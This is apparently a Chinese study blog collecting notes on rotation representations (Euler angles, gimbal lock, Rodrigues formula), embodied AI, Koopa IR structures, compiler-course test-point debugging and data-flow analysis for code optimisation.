  1. 对于一个旋转矩阵,其欧拉角可能不唯一

    $$ \begin{aligned}R_z(45°)R_y(90°)R_x(45°)&=R_z(90°)R_y(90°)R_x(90°)\&=\begin{bmatrix}0&0&1\0&1&0\-1&0&0\end{bmatrix}\end{aligned} $$

  2. Gimbal Lock:如果三次旋转中第二次旋转 $\beta$ 的角度为 $\pi/2$,那么剩下 2 个自由度会变成 1 个。

    $$ R_z(\alpha) = \begin{bmatrix} \cos\alpha & -\sin\alpha & 0 \ \sin\alpha & \cos\alpha & 0 \ 0 & 0 & 1 \end{bmatrix} \ R_y(\beta) = \begin{bmatrix} \cos\beta & 0 & \sin\beta \ 0 & 1 & 0 \ -\sin\beta & 0 & \cos\beta \end{bmatrix} = \begin{bmatrix} 0 & 0 & 1 \ 0 & 1 & 0 \ -1 & 0 & 0 \end{bmatrix} \ R_x(\gamma) = \begin{bmatrix} 1 & 0 & 0 \ 0 & \cos\gamma & -\sin\gamma \ 0 & \sin\gamma & \cos\gamma \end{bmatrix} $$

    带入、合并计算:

    $$ R_y(\pi/2)R_x(\gamma) = \begin{bmatrix} 0 & 0 & 1 \ 0 & 1 & 0 \ -1 & 0 & 0 \end{bmatrix} \begin{bmatrix} 1 & 0 & 0 \ 0 & \cos\gamma & -\sin\gamma \ 0 & \sin\gamma & \cos\gamma \end{bmatrix} = \begin{bmatrix} 0 & \sin\gamma & \cos\gamma \ 0 & \cos\gamma & -\sin\gamma \ -1 & 0 & 0 \end{bmatrix} $$

    $$ \begin{aligned} R &= R_z(\alpha) [R_y(\pi/2)R_x(\gamma)] = \begin{bmatrix} \cos\alpha & -\sin\alpha & 0 \ \sin\alpha & \cos\alpha & 0 \ 0 & 0 & 1 \end{bmatrix} \begin{bmatrix} 0 & \sin\gamma & \cos\gamma \ 0 & \cos\gamma & -\sin\gamma \ -1 & 0 & 0 \end{bmatrix} \ &= \begin{bmatrix} 0 & \cos\alpha\sin\gamma - \sin\alpha\cos\gamma & \cos\alpha\cos\gamma + \sin\alpha\sin\gamma \ 0 & \sin\alpha\sin\gamma + \cos\alpha\cos\gamma & \sin\alpha\cos\gamma - \cos\alpha\sin\gamma \ -1 & 0 & 0 \end{bmatrix} \ &= \begin{bmatrix} 0 & -\sin(\alpha-\gamma) & \cos(\alpha-\gamma) \ 0 & \cos(\alpha-\gamma) & \sin(\alpha-\gamma) \ -1 & 0 & 0 \end{bmatrix} \end{aligned} $$

轴角表示法

欧拉定理:任意三维空间中的旋转都可以表示为绕一个固定轴 $\hat{\omega} \in \mathbb{R}^3$(单位向量,满足 $|\hat{\omega}| = 1$)旋转一个正角度 $\theta$ 的结果。

其中:

  • $\hat{\omega}$:旋转轴的单位向量。
  • $\theta$:旋转角度(正方向遵循右手定则)。
  • $R\in\mathbb{SO}(3):=\mathrm{Rot}(\hat{\omega},\theta)$:三维旋转矩阵,必然可以表示为绕 $\hat{\omega}$ 旋转角度 $\theta$ 的变换。

vector_rotation_angle_diagram

轴角表示法的问题:

  • 不唯一性:$(\hat{\omega}, \theta)$ 和 $(-\hat{\omega}, -\theta)$ 代表同一个旋转
  • 当旋转是单位矩阵 $R=I$ 时(即没有旋转),$\theta=0$,此时旋转轴 $\hat{\omega}$ 可以是任意方向。
  • 当旋转角度 $\theta = \pi$ 时,绕轴 $\hat{\omega}$ 和绕轴 $-\hat{\omega}$ 旋转 $\pi$ 得到的结果是相同的。这种情况对应 $\text{tr}(R) = -1$。

如果我们将旋转角 $\theta$ 限制在 $(0, \pi)$ 这个开区间内,那么对于大部分旋转,其轴角表示就是唯一的(不考虑不旋转、旋转 $\pi$)。

轴角表示到旋转矩阵

对于一个单位轴向量(axis)$\mathbf{u} = [x, y, z]^\top$,其对应的叉乘矩阵(cross product matrix)$K$ 定义为:

$$ K = \begin{bmatrix} 0 & -z & y \ z & 0 & -x \ -y & x & 0 \end{bmatrix} $$

其具有性质:当 $K$ 与任意向量 $\mathbf{v}$ 相乘时,运算结果等同于 $\mathbf{u}$ 和 $\mathbf{v}$ 的叉乘:

$$ K\mathbf{v} = \begin{bmatrix} 0 & -z & y \ z & 0 & -x \ -y & x & 0 \end{bmatrix} \begin{bmatrix} v_1 \ v_2 \ v_3 \end{bmatrix} = \begin{bmatrix} -z v_2 + y v_3 \ z v_1 - x v_3 \ -x v_2 + y v_1 \end{bmatrix} = \mathbf{u} \times \mathbf{v} $$

那么,绕单位轴 $\mathbf{u}$ 旋转 $\theta$ 的旋转矩阵 $R_\theta$ 可以表示为:

$$ \begin{aligned} R_\theta &= \cos\theta \cdot I + (1-\cos\theta)(\mathbf{u}\mathbf{u}^\top) + \sin\theta \cdot K \ &= I + (1-\cos\theta)(\mathbf{u}\mathbf{u}^\top - I) + \sin\theta \cdot K \ & = I + (1-\cos\theta) K^2 + \sin\theta \cdot K \end{aligned} $$

这就是 Rodrigues 旋转公式(矩阵形式)

为了证明它,我们先证明向量形式:

Rodrigues 旋转公式(向量形式):在 3D 空间中,任意一个向量 $\mathbf{v}$ 沿着单位向量 $\mathbf{u}$ 旋转 $\theta$ 角度之后的向量 $\mathbf{v}'$ 为:

$$ \mathbf{v}' = \cos(\theta)\mathbf{v} + (1 - \cos(\theta))(\mathbf{u} \cdot \mathbf{v})\mathbf{u} + \sin(\theta)(\mathbf{u} \times \mathbf{v}) $$

其详细证明参见 Krasjet / Quaternion 第 2 节・三维空间中的旋转(第 11 页)。

从向量形式稍加变形,我们就能得到矩阵形式:

$$ \begin{aligned} \mathbf{v}^{\prime}&=\cos(\theta)\mathbf{v}+(1-\cos(\theta))(\mathbf{u}\cdot\mathbf{v})\mathbf{u}+\sin(\theta)(\mathbf{u}\times\mathbf{v}) \ &=\cos(\theta)\mathbf{v}+(1-\cos(\theta))(\mathbf{u}^\top\mathbf{v})\mathbf{u}+\sin(\theta)(\mathbf{u}\times\mathbf{v}) \ &=\cos(\theta)\mathbf{v}+(1-\cos(\theta))\mathbf{u}(\mathbf{u}^\top\mathbf{v})+\sin(\theta)(\mathbf{u}\times\mathbf{v}) \ &=\begin{bmatrix}\cos(\theta)I+(1-\cos(\theta))(\mathbf{u}\mathbf{u}^\top)+\sin(\theta)K\end{bmatrix}\mathbf{v} \ &=R_\theta\mathbf{v} \end{aligned} $$

旋转矩阵 $R_\theta$ 也可以写成:

$$ R_\theta = e^{\theta K} $$

我们可以证明后者和前者是等价的:

$$ e^{\theta K} = I + \theta K + \frac{(\theta K)^2}{2!} + \frac{(\theta K)^3}{3!} + \cdots $$

而我们又有:

$$ K^2 = \begin{bmatrix} -z^2 - y^2 & xy & xz \ xy & -x^2 - z^2 & yz \ xz & yz & -x^2 - y^2 \end{bmatrix} $$

利用 $\mathbf{u}$ 是单位向量的性质($x^2 + y^2 + z^2 = 1$),可简化为:

$$ K^2 = \mathbf{u}\mathbf{u}^\top - I $$

所以:

$$ K^3 = K \cdot K^2 = K (\mathbf{u}\mathbf{u}^\top - I) = K \mathbf{u}\mathbf{u}^\top - K = -K $$

这里利用了叉乘性质 $K\mathbf{u} = \mathbf{u} \times \mathbf{u} = \mathbf{0}$。

所以:

$$ K^3 = -K, \quad K^4 = -K^2, \quad K^5 = K, \quad \dots $$

带回展开形式,合并同类项:

$$ \begin{aligned} e^{\theta K} &= I + \left(\theta - \frac{\theta^3}{3!} + \frac{\theta^5}{5!} - \cdots\right)K + \left(\frac{\theta^2}{2!} - \frac{\theta^4}{4!} + \cdots\right)K^2 \ &= I + \sin\theta K + (1 - \cos\theta)K^2 \ &= I + \sin\theta K + (1 - \cos\theta)(\mathbf{u}\mathbf{u}^\top - I) \ &= \cos\theta I + (1 - \cos\theta)\mathbf{u}\mathbf{u}^\top + \sin\theta K \ &= R_\theta \end{aligned} $$

从旋转矩阵 R 反求 $(\hat{\omega}, \theta)$

当 $\theta \in (0, \pi)$ 时,可以通过以下公式从旋转矩阵 $R$ 计算出 $\theta$ 和 $\hat{\omega}$:

  • $\theta = \arccos \frac{1}{2}[\text{tr}(R) - 1]$

  • $[\hat{\omega}] = \frac{1}{2 \sin \theta}(R - R^\top)$

    注意:$[\hat{\omega}]$ 表示与向量 $\hat{\omega}$ 相关联的反对称矩阵(skew-symmetric matrix)/ 叉乘矩阵

证明:$\theta = \arccos \frac{1}{2}[\text{tr}(R) - 1]$

对罗德里格公式两边取迹 (trace):

$$ \text{tr}(R) = \text{tr}(I + \sin \theta [\hat{\omega}] + (1 - \cos \theta) [\hat{\omega}]^2) $$

利用迹的线性性质 $\text{tr}(A+B) = \text{tr}(A) + \text{tr}(B)$ 和 $\text{tr}(cA) = c \cdot \text{tr}(A)$:

$$ \text{tr}(R) = \text{tr}(I) + \sin \theta \cdot \text{tr}([\hat{\omega}]) + (1 - \cos \theta) \cdot \text{tr}([\hat{\omega}]^2) $$

代入已知的迹的值:$\text{tr}(I)=3$, $\text{tr}([\hat{\omega}])=0$, $\text{tr}([\hat{\omega}]^2)=-2$。

$$ \begin{aligned} \text{tr}(R) &= 3 + \sin \theta \cdot 0 + (1 - \cos \theta) \cdot (-2) \ &= 3 - 2(1 - \cos \theta) = 3 - 2 + 2 \cos \theta \ &= 1 + 2 \cos \theta \end{aligned} $$

整理得到 $\cos \theta$:

$$ 2 \cos \theta = \text{tr}(R) - 1 \ \cos \theta = \frac{1}{2}[\text{tr}(R) - 1] \ \theta = \arccos \left( \frac{1}{2}[\text{tr}(R) - 1] \right) $$

证明:$[\hat{\omega}] = \frac{1}{2 \sin \theta}(R - R^\top)$

首先计算 $R$ 的转置 $R^\top$。

利用性质:

  • $[\hat{\omega}]^\top = -[\hat{\omega}]$

  • $([\hat{\omega}]^2)^\top = ([\hat{\omega}][\hat{\omega}])^\top = [\hat{\omega}]^\top [\hat{\omega}]^\top = (-[\hat{\omega}])(-[\hat{\omega}]) = [\hat{\omega}]^2$

    即 $[\hat{\omega}]^2$ 是对称矩阵。

$$ \begin{aligned} R^\top &= (I + \sin \theta [\hat{\omega}] + (1 - \cos \theta) [\hat{\omega}]^2)^\top \ &= I^\top + (\sin \theta [\hat{\omega}])^\top + ((1 - \cos \theta) [\hat{\omega}]^2)^\top \ &= I + \sin \theta [\hat{\omega}]^\top + (1 - \cos \theta) [\hat{\omega}]^2 \ &= I - \sin \theta [\hat{\omega}] + (1 - \cos \theta) [\hat{\omega}]^2 \end{aligned} $$

现在计算 $R - R^\top$:

$$ \begin{aligned} R - R^\top &= (I + \sin \theta [\hat{\omega}] + (1 - \cos \theta) [\hat{\omega}]^2) - (I - \sin \theta [\hat{\omega}] + (1 - \cos \theta) [\hat{\omega}]^2) \ &= (I - I) + (\sin \theta - (-\sin \theta)) [\hat{\omega}] + ((1 - \cos \theta) - (1 - \cos \theta)) [\hat{\omega}]^2 \ &= 0 + (2 \sin \theta) [\hat{\omega}] + 0 \ &= 2 \sin \theta [\hat{\omega}] \end{aligned} $$

当 $\theta \in (0, \pi)$ 时,$\sin \theta \neq 0$,所以我们可以两边同除以 $2 \sin \theta$:

$$ [\hat{\omega}] = \frac{1}{2 \sin \theta}(R - R^\top) $$

由此,我们可以定义两个旋转矩阵之间的 旋转距离

旋转距离:从姿态 $R_1$ 转到姿态 $R_2$ 所需的最小旋转角度。

易知,两个旋转的关系是:

$$ (R_2 R_1^\top) R_1 = R_2 $$

那么,旋转距离 $\text{dist}(R_1, R_2)$ 由以下公式给出(注意 $\theta(\cdot)$ 是上述欧拉定理中的函数):

$$ \text{dist}(R_1, R_2) = \theta(R_2 R_1^\top) = \arccos\left(\frac{1}{2} \big[\text{tr}(R_2 R_1^\top) - 1\big]\right) $$

四元数(Quaternion)

扩展内容,下节课详细推导。

参考:

  1. Krasjet / Quaternion
  2. Wiki / Quaternion

💾

初见具身智能

2025年3月2日 01:01

汽车工厂机器人

核心:预设计并计算轨迹,随后只是重放轨迹,实际上是不断 “重放”

问题:

  • 部署耗时
  • 无法灵活处理多任务

如果想要足够通用,则需要像人,才能实现 “通用机器人”(Task generalists),能够形成 perception-action loop(感知 - 动作循环)

实际上是形成了一个神经网络:

  • 输入:本体状态、控制信息、环境信息
  • 输出:下一步的关节控制

VLA (Vision Language Action Model)

神经网络:

  • 输入:V (vision) + L (language),现在有 VLM 模型
  • 输出:A (action)

思维活动:

  • 快系统(Faster system):动作生成
  • 慢系统(Slower system):复杂推理

人脑:

  • 大脑进行感知
  • 小脑控制动作

观点:没有具身智能,就没有 AGI。

困境

具身智能最大的问题:缺少真实数据,不能满足 Scaling Law 所需的数据量。

和智能驾驶不一样,在真实世界中快速采集到所需数据是几乎不可能的。

神经网络还有一个问题,就是泛化性,因为在真实世界中数据的分布可能会与训练集的分布不一致。

可能的解决方法:合成数据。

优点:

  • 无需注释
  • 高效节约时间
  • 可转移到现实世界

💾

Koopa IR 人话版

2025年1月14日 08:09

切片 Slice

slice 是存储一系列元素的数组。具体来说,koopa_raw_slice_t 是一个结构体,用于表示一个元素数组及其长度。其定义如下:

typedef struct {
  // 数组指针
  const void **buffer;
  // 数组长度
  uint32_t len;
  // 数组中元素的类型
  koopa_raw_slice_item_kind_t kind;
} koopa_raw_slice_t;
  • buffer:指向元素数组的指针。数组中的每个元素都是 const void * 类型,这意味着它可以指向任何类型的对象。
  • len:数组的长度,即数组中元素的数量。
  • kind:数组中元素的类型,用 koopa_raw_slice_item_kind_t 枚举类型表示,可以是类型、函数、基本块或值等。

基本块 Basic Block

basic block 就是一系列的指令集合,在其内逻辑流不会发生跳转。

需要注意的是,基本块的结尾必须是 brjumpret 指令其中之一 (并且,这些指令只能出现在基本块的结尾)。也就是说,即使两个基本块是相邻的,例如上述程序的 %else 基本块和 %end 基本块,如果你想表达执行完前者之后执行后者的语义,你也必须在前者基本块的结尾添加一条目标为后者的 jump 指令。这点和汇编语言中 label 的概念有所不同。

比如一段代码:

int main() {
  int b = 1;
  if (b == 1) {
    return 1;
  }
  else {
    return 2;
  }
}

其被翻译为如下的 KoopaIR:

fun @main(): i32 {
%main_entry:
	@b_2 = alloc i32
	store 1, @b_2
	%0 = load @b_2
	%1 = eq %0, 1
	br %1, %then_0, %else_0
%then_0:
	ret 1
%jump_0:
	jump %end_0
%else_0:
	ret 2
%jump_1:
	jump %end_0
%end_0:
	ret 0
}

这里,每个标号分开的区域就是一个基本块。

value

value 对应 koopa_raw_value_t 类型,表示指向一个值的指针,多数情况下,你可以认为它是一个指令的相关信息,因为我们知道,在 KoopaIR 中是静态单赋值,它总是类似下面这种只赋值一次的指令:

@b_2 = alloc i32
store 1, @b_2
@c_2 = alloc i32
store 2, @c_2
@d_2 = alloc i32
store 3, @d_2
@e_2 = alloc i32
store 4, @e_2
%0 = load @b_2
%1 = load @c_2
%2 = add %0, %1
%3 = load @d_2
%4 = add %2, %3
%5 = load @e_2
%6 = add %4, %5
ret %6

所以,这里你会发现,大多数指令就是一个 ,他们总是引用了一些别的值,做了一些事情。

比如,%0 = load @b_2,就会引用两个值,一个是 @b_2,另一个是 %0

这些引用的值记作这个 valuedata,根据操作的不同,其会有不同的字段,比如对于 load 指令,你需要如下访问到他的 data:

value->kind.data.load

它会有两个属性:

  • src:代表被加载的值
  • dest:代表存放加载结果的值

这两者类型也都为 koopa_raw_value_t

value 所谓的这个值也可以是代表 KoopaIR 中用到的一些“东西”,如 interger 代表一个数,又如 aggregate 代表一个初始化列表。其的定义链如下:

typedef const koopa_raw_value_data_t *koopa_raw_value_t;
typedef struct koopa_raw_value_data koopa_raw_value_data_t;

所以,对其解引用后就会得到 koopa_raw_value_data 类型,其定义如下:

struct koopa_raw_value_data {
  // 值的静态类型
  koopa_raw_type_t ty;
  // 值的名称
  const char *name;
  // 值被哪些值使用
  koopa_raw_slice_t used_by;
  // 值的具体种类,代表值的动态行为
  koopa_raw_value_kind_t kind;
};
  • ty:值的类型信息,用于描述值的静态类型,对应 koopa_raw_type_t 类型,一个值可以是 int32pointerfunction 等。
  • name:值的名称,如 @a_0@main 等,只对 funcalloc 指令有意义。
  • used_by:值被哪些值使用,对应 koopa_raw_slice_t 类型,表示值被哪些指令使用。
  • kind:值的类型和依赖关系,用于描述值的动态行为,对应 koopa_raw_value_kind_t 类型,表示指令的类型,如 integeraggregate 等。
typedef struct {
  koopa_raw_value_tag_t tag;
  union {
    koopa_raw_integer_t integer;
    koopa_raw_aggregate_t aggregate;
    koopa_raw_func_arg_ref_t func_arg_ref;
    koopa_raw_block_arg_ref_t block_arg_ref;
    koopa_raw_global_alloc_t global_alloc;
    koopa_raw_load_t load;
    koopa_raw_store_t store;
    koopa_raw_get_ptr_t get_ptr;
    koopa_raw_get_elem_ptr_t get_elem_ptr;
    koopa_raw_binary_t binary;
    koopa_raw_branch_t branch;
    koopa_raw_jump_t jump;
    koopa_raw_call_t call;
    koopa_raw_return_t ret;
  } data;
} koopa_raw_value_kind_t;
  • tag:值的种类,对应 koopa_raw_value_tag_t 枚举类型。
  • data:值的具体数据,根据 tag 的不同,有不同的结构体。如上文所说的 load 指令,其 tagKOOPA_RVT_LOAD,其 datakoopa_raw_load_t 类型,而 koopa_raw_load_t 又会有 load 指令所需的 srcdest 两个指令字面字段。

类型 type

类型 type 对应 koopa_raw_type_t 类型,表示指向一个 koopa_raw_type_kind_t 类型的指针,用于描述值的静态类型,一个值可以是 int32pointerfunction 等。

typedef const koopa_raw_type_kind_t *koopa_raw_type_t;
typedef struct koopa_raw_type_kind {
  koopa_raw_type_tag_t tag;
  union {
    struct {
      const struct koopa_raw_type_kind *base;
      size_t len;
    } array;
    struct {
      const struct koopa_raw_type_kind *base;
    } pointer;
    struct {
      koopa_raw_slice_t params;
      const struct koopa_raw_type_kind *ret;
    } function;
  } data;
} koopa_raw_type_kind_t;
  • tag:类型标签,表示类型的种类,对应 koopa_raw_type_tag_t 枚举类型。
  • data:类型数据,根据 tag 的不同,有不同的结构体,也可能没有数据只是分配了空间。
typedef enum {
  // 32 位整数
  KOOPA_RTT_INT32,
  // 空类型
  KOOPA_RTT_UNIT,
  // 数组
  KOOPA_RTT_ARRAY,
  // 指针
  KOOPA_RTT_POINTER,
  // 函数
  KOOPA_RTT_FUNCTION,
} koopa_raw_type_tag_t;

初始化列表 aggregate

一个数组:

int a[2][2] = {1, 2, 3, 4};

会被 KoopaIR 翻译为:

global @a_0 = alloc [[i32, 2], 2], {{1, 2}, {3, 4}}

那么 {{1, 2}, {3, 4}} 就是一个 aggregate,它的元素是两个 aggregate,即 {1, 2}{3, 4},其中每个 aggregate 的元素是两个 integer

指针 get_ptr / get_elem_ptr

若一个 valuekind.tagKOOPA_RVT_GET_PTRKOOPA_RVT_GET_ELEM_PTR,则其 kind.datakoopa_raw_get_ptr_tkoopa_raw_get_elem_ptr_t,里面存放了值的依赖关系:

typedef struct {
  // 源
  koopa_raw_value_t src;
  // 索引
  koopa_raw_value_t index;
} koopa_raw_get_ptr_t;

typedef struct {
  // 源
  koopa_raw_value_t src;
  // 索引
  koopa_raw_value_t index;
} koopa_raw_get_elem_ptr_t;

举例说明,对于指令:

%0 = get_ptr @a_0, 1
%0 = get_elem_ptr @a_0, 1
  • @a_0src
  • 1index

那么,有时候我们还会想要获得指针所指向范围的大小,那么我们就可以使用 get_alloc_size 函数。

int get_alloc_size(const koopa_raw_type_t ty) {
    switch (ty->tag) {
        // 空类型不占用空间
    case KOOPA_RTT_UNIT:
        return 0;
        // 函数类型不占用空间
    case KOOPA_RTT_FUNCTION:
        return 0;
        // 32 位整数占用 4 字节
    case KOOPA_RTT_INT32:
        return 4;
        // 指针类型占用 4 字节
    case KOOPA_RTT_POINTER:
        return 4;
        // 数组类型占用空间为数组长度乘以数组元素类型占用空间
    case KOOPA_RTT_ARRAY:
        return ty->data.array.len * get_alloc_size(ty->data.array.base);
    default:
        printf("Invalid type: %s\n", koopaRawTypeTagToString(ty->tag).c_str());
        assert(false);
    }
}
  • 对于一个 value.kind.tag = KOOPA_RVT_GET_PTRvalue,我们使用 get_alloc_size(value.kind.data.get_ptr.src->ty->data.pointer.base) 来获得指针的步长
  • 对于一个 value.kind.tag = KOOPA_RVT_GET_ELEM_PTRvalue,我们使用 get_alloc_size(value.kind.data.get_elem_ptr.src->ty->data.pointer.base) 来获得指针的步长

一时间也想不到什么很好的说法来通俗的说明...

💾

编译原理大作业的奇妙测试点们

2025年1月14日 08:09

Lv3

Riscv

发现 27_complex_binary 寄存器超过使用限制了,得复用寄存器才行,不能每个中间结果都开一个新的。

但其实无所谓,Lv4 会将寄存器完全改为使用栈来存储,所以不用 care,写完 Lv4 自然就过了。

Lv4

Koopa

在测试点 18_multiple_returns2 中,存在多条 return 语句,形如:

int main(){
    return 0; return 1;
}

我们应当只处理到第一个 return 语句后,就停止处理(或者提前看后续 Lv6 的实现办法)

Riscv

发现过不去 21_decl_after_decl3 测试点,遂检查了一下代码,发现是不能仅仅只在 loadstore 指令中重置寄存器计数,对于 binary 指令,也需要重置寄存器计数。

来自写完之后的补充:后来就是在每次 void visit(const koopa_raw_value_t& value) 时,都会先重置寄存器计数了。

Lv6

Koopa

惨不忍睹:

Lv5:07_empty_ block1 09_summary1 11_ret_in_block2 14_ret_in_block3

Lv6:13_branch2

这些点都是因为最后一条语句的处理问题。

需要注意的是,基本块的结尾必须是 br,jump 或 ret 指令其中之一 (并且,这些指令只能出现在基本块的结尾)。也就是说,即使两个基本块是相邻的,例如上述程序的 % else 基本块和 % end 基本块,如果你想表达执行完前者之后执行后者的语义,你也必须在前者基本块的结尾添加一条目标为后者的 jump 指令。这点和汇编语言中 label 的概念有所不同。

值得一提的是,如下 Koopa IR 是合法的:

%then_0:
	ret 1
%return_end_0:
	jump %end_0

所以,我们得到一个弱智但有效的做法:给所有 ret 语句后都添加一个新的标签,保证每个 print 函数的末尾不是一条 br / jump / ret,就可以了。

另外,在同一函数体内出现多个同名 alloc 指令是不合法的。

Lv6:14_else_match2,检查是否正确处理了 if else 的 label。

Riscv

这里发现始终过不去 11_logical1 测试点,先 AEWA

首先是 AE,发现是我在处理 12 位立即数偏置的时候,错误地使用了 reg(sp) 的形式。

实际上偏移量不是指做成 t1(sp),而是先做 t1 = bias; t1 = sp + t1,然后再 lw t0, (t1)。对 sw 指令同理。

接着是 WA,发现是我在处理 12 位立即数的时候,寄存器分配出现了问题,我手动调整了 context.stack_used 的值为临界值 2040 后,发现是我原先对于 load 处的寄存器分配有问题,我使用了 cur_reg 而不是 new_reg,这会导致如果 load 指令目标偏置超过 12 位立即数限制,那么在 riscv._lw(reg, "sp", context.stack_map[load.src]); 中,会隐式地发现偏置大于 2048 并再次分配 t0 来存储偏置,从而造成一句 lw t0, (t0) 的指令。修改为 new_reg 后,即可 AC。

Lv7

Koopa

关于短路求值的一个测试点:需要注意一下,对于逻辑表达式,其返回值一定是一个布尔类型,所以你需要考虑如下的测试点,其不能被用常量传播直接求出:

int main() {
    int x = 2;
    putint(0||x);
	putch(10);
}

这个点的输出应当是 1,而不是 2。这个测试点甚至在全部的本地/在线测试中都不存在类似的,导致我直到通过了所有测试开始逐行加注释改善代码质量的时候才发现。

Lv8

Koopa

发现在 16_summary1 测试点上 AE 了,仔细检查尝试,发现了问题,即在不同函数体内可能声明同样的变量:

int f() {
  int a = 1;
}

int g() {
  int a = 2;
}

这意味着你需要在每次进入函数体时清空 is_symbol_allocated,在两个函数体内各自生成一次 alloc 指令。

Lv9

Koopa

你需要考虑形如 {} 的初始化,这个东西只要出现,就至少会初始化掉一个步长。

如果你发现在 22_arr_init1 测试点 WA / AE,那么就很有可能是此原因导致的,你可以本地测试如下测试点:

const int buf[3][3][1] = { 1,{},2 };

这个测试点的输出应当是

alloc [[[i32, 1], 3], 3], {{{1}, {0}, {2}}, {{0}, {0}, {0}}, {{0}, {0}, {0}}}

如果你仅仅在处理第二个 {} 的时候检查对齐,而不考虑其 init_values 为空,一上来就对齐导致完全没有补 0 进而被直接跳过,那么很容易得到:

alloc [[[i32, 1], 3], 3], {{{1}, {2}, {0}}, {{0}, {0}, {0}}, {{0}, {0}, {0}}}

另外一个测试点是:

const int buf[2][3] = {{}, 1};

这个测试点输出应当是:

global @buf_0 = alloc [[i32, 3], 2], {{0, 0, 0}, {1, 0, 0}}

一个数组表达式的 LVal 出现的位置是不确定的,其既可以作为值,也可以作为指针参数去调用函数,我们必须判断输出它时究竟是哪种情况,进而输出不同的 Koopa IR。

而判断的方法,就是看我们调用他们所使用的维度个数,相对于我们初始化他们时的维度个数的关系。

  • 若调用时使用的维度个数等于初始化时知道的维度个数,则其为值,我们最后补上的应当是一句 load 指令
  • 若调用时使用的维度个数小于初始化时知道的维度个数,则其为指针,我们最后补上的应当是一句 getelemptr 指令

注:对于指针的情况,你要记录他的维度为表达式 + 1。

Riscv

一个测试点:

int main() {
  int b[2][3] = { 1, 2, 3, 4 };
  putint(b[0][1]);
  putch(10);
  return 0;
}

测试输出是 4 还是 2?如果是 4,那么说明你对于 getelemptr 指令的翻译有问题。

这是因为,getelemptr %0, 1 指令的翻译并不一定是 +4,而是也需要像之前一样,使用 get_alloc_size 函数来计算 %0 的偏移步长。

如果你本地所有测试、远程的从 Koopa 也能过,但是 Riscv 差一个点,那么可能是存在长跳转的问题,即跳转范围超过了 bnezbeqz 的跳转范围,所以需要使用 jump 指令。

只需要修改一下这两条的指令的实现,在 bnezbeqz 旁边添加新的标号,然后将原先的短跳转转为长跳转 jump 指令即可。

性能测试

发现是没有在 main.cpp 中允许 -perf 的模式(其实就是和 -riscv 一样),添加一下就行。

💾

程序优化

2025年1月7日 17:15

代码优化概述

代码优化的原则:

  • 保证安全(确保语义 / 可观察行为不变)
  • 提高效率(二八法则:80% 时间在 20% 代码上,主要优化这 20% 代码)

优化方式:

  • 算法设计阶段
  • 编译阶段
  • 语义分析:根据静态检查,优化 源程序
  • 中间代码生成:机器无关优化
  • 目标代码生成:机器有关优化
  • 链接时刻优化

代码优化器的结构

42345

代码优化的范围

  • 局部优化:基本块内(即标号分割的块)
  • 区域性优化:若干个基本块构成的区域
  • 全局优化:一个过程内所有基本块
  • 过程间优化:一个程序所有过程及其基本块

代码优化的常用方法

  • 公共子表达式消除
  • 复写传播(消除 a=b)
  • 死代码消除
  • 常量折叠 / 常量传播:直接推导出表达式的值是否为常量,若为常量则直接用其替换该表达式
  • 代码外提(循环中不变量外提)
    • 循环不变式:不管循环执⾏多少次都得到相同结果的表达式
  • 强度消减:减少操作次数、操作强度(如将二的幂次乘除法转换为移位操作)
    • 归纳变量:每次循环都增加恒定常数的变量
    • 如果一组归纳变量变化步调一致,考虑消除一些
  • 数据流分析

数据流分析

数据流分析是一种静态代码分析技术,用于在程序编译时推导出程序各部分可能的行为。它通过分析变量和表达式在程序中的流动情况,帮助我们理解程序在不同点上的状态。

一些基本概念:

  1. 基本块(Basic Block):一个基本块是一段没有分支和跳转的连续代码。换句话说,它是一个入口和一个出口之间的代码段,只有在入口处进入,并且在出口处离开。
  2. 控制流图(Control Flow Graph, CFG):控制流图是由基本块作为节点,控制流作为边构成的有向图。它展示了程序执行的所有可能路径。

通过数据流方程,计算每个基本块的入口和出口状态。常见的数据流方程包括:

  • 到达定义(Reaching Definitions):哪些变量定义可以到达这个基本块。
  • 活跃变量(Live Variables):哪些变量在基本块之后仍然需要使用。
  • 可用表达式(Available Expressions):哪些表达式在基本块入口处已经计算过且没有被修改。

数据流抽象

基本概念:

  • 程序点(program point):每条语句对应其前、后两个程序点
    • 基本块内两条语句 $s_1, s_2$,$s_1$ 后的程序点与 $s_2$ 前的程序点相同
  • 路径(path):程序点 $p_1, p_2, \ldots, p_n$ 构成的序列,对于任意 $1 \leq i < n$,必然有二者之一(人话就是他们连着):
    • 点 $p_i$ 和点 $p_{i+1}$ 是一条语句前、后的两个程序点
    • 点 $p_i$ 指向基本块的结尾,点 $p_{i+1}$ 指向该基本块后继的开头(连接不同基本块)

数据流分析推导

对于每个程序点 $p$:

  • 前向(forward)分析:以 $p$ 为终点的所有路径的集合的性质(人话就是顺着逻辑流走)
  • 后向(backward)分析:以 $p$ 为起点的所有路径的集合的性质(人话就是逆着逻辑流走)

前向分析模式

  • 数据流分析的域 $V$,交汇运算 $\wedge: V \times V \rightarrow V$,顶值 $T \in V$
  • 每个基本块 $B$ 的传递函数 $f_B: V \rightarrow V$ (从入口到出口)
  • 边界条件:$\text{OUT}[\text{ENTRY}] = \nu_{\text{ENTRY}}$
  • 初始值:$\text{OUT}[B] = T \quad (B \neq \text{ENTRY})$
  • 方程组:对任意 $B \neq \text{ENTRY}$,有 $$ \begin{aligned} &\text{IN}[B] = \bigwedge_{P \text{是} B \text{的前驱}} \text{OUT}[P] \ &\text{OUT}[B] = f_B(\text{IN}[B]) \end{aligned} $$

后向分析模式

  • 数据流分析的域 $V$,交汇运算 $\wedge: V \times V \rightarrow V$,顶值 $T \in V$(即不清楚值时的默认输入)
  • 每个基本块 $B$ 的传递函数 $f_B: V \rightarrow V$ (从出口到入口)
  • 边界条件:$\text{IN}[\text{EXIT}] = \nu_{\text{EXIT}}$
  • 初始值:$\text{IN}[B] = T \quad (B \neq \text{EXIT})$
  • 方程组:对任意 $B \neq \text{EXIT}$,有 $$ \begin{aligned} &\text{OUT}[B] = \bigwedge_{S \text{是} B \text{的后继}} \text{IN}[S] \ &\text{IN}[B] = f_B(\text{OUT}[B]) \end{aligned} $$

活跃变量分析

活跃变量:在程序点 $p$ 之后仍然需要使用的变量

  • 分析模式:后向分析模式
  • 基础定义:
    • $\text{def}_B$:基本块 $B$ 中定义的变量
    • $\text{use}_B$:基本块 $B$ 中使用的变量
  • 分析域 $V$:变量集
  • 交汇运算 $\land$: $$ O_1 \land O_2 = O_1 \cup O_2 $$ 即:在任意后继中活跃则认为是活跃的。
  • 顶值 $T$:$\varnothing$
  • 传递函数 $f_B$:$f_B(O) = (O - \text{def}_B) \cup \text{use}_B$
